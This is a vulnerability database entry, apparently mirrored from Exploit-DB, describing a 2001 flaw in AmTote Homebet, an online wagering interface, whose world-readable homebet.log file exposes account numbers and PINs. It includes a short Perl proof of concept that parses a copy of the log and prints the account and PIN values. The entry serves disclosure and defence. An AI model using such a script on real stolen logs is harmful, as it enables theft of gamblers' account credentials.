Lucene search
+L

AmTote Homebet - World Accessible Log

🗓️ 28 Sep 2001 00:00:00Reported by Gary O'Leary-SteeleType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 23 Views

AmTote Homebet stores account and PIN numbers in a world-readable log file, risking theft.

Related
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-2001-1170
15 Mar 200205:00
cve
cvelist
Cvelist
CVE-2001-1170
15 Mar 200205:00
cvelist
euvd
EUVD
EUVD-2001-1151
7 Oct 202500:30
euvd
nvd
NVD
CVE-2001-1170
29 Sep 200104:00
nvd
source: https://www.securityfocus.com/bid/3370/info

AmTote Homebet is an Internet-based account wagering interface.

Homebet stores all account and corresponding PIN numbers in the homebet.log file stored in the Homebet virtual directory. On a default installation, the homebet.log file is world readable. This could allow an attacker to steal the log file and strip out the account and PIN numbers.

$logfile='c:\windows\desktop\homebet.log'; ##change as required
print "Extracting Account/pin numbers";
open(INFILE,$logfile);
while(<INFILE>){
($accn,$pin)=split(/account=/,$_);
if ($pin){print "Account Number=".$pin;}
}

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

06 Sep 2012 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 25
EPSS0.07571
23